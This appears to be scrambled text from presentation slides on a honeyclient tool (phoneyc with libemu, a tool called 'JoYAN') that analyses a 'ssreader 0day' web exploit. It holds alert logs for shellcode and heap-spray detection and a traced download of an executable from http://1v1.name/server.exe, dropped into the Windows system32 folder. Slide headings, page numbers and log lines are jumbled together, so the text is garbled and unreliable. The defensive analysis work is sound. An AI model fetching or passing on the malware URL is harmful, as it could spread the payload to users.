17 [ALERT] 0: 141847268 −> Shellcode Detected HIT: 1
Runing shellcode... offset:248
JoYAN
DEBUG: Begin analyzing ...
DEBUG: download http://1v1.name/server.exe −>
26
27. A Run on ssreader 0day.html II
phoneyc with
libemu
Z. Chen
c:WINDOWSsystem32a.exe
phoneyc
22
WB Malware ...
Libemu
Tracing JS URLs:[’http://1v1.name/server.exe’, ’http://1v1.name/server.
Basic Principles exe’]
SCDetection Done
Basic Idea
Details
27 [ALERT] 0: 141847524 −> Shellcode Detected HIT: 1
Source Files [ALERT] 0: 141723488 −> Shellcode & Potential heapspray sledge HIT:
Implementation
100
HS Detection
VBS EVAL IFRAMES []
Current
Results
HREFS []
FRAMES []
32 IMAGES []
JoYAN 27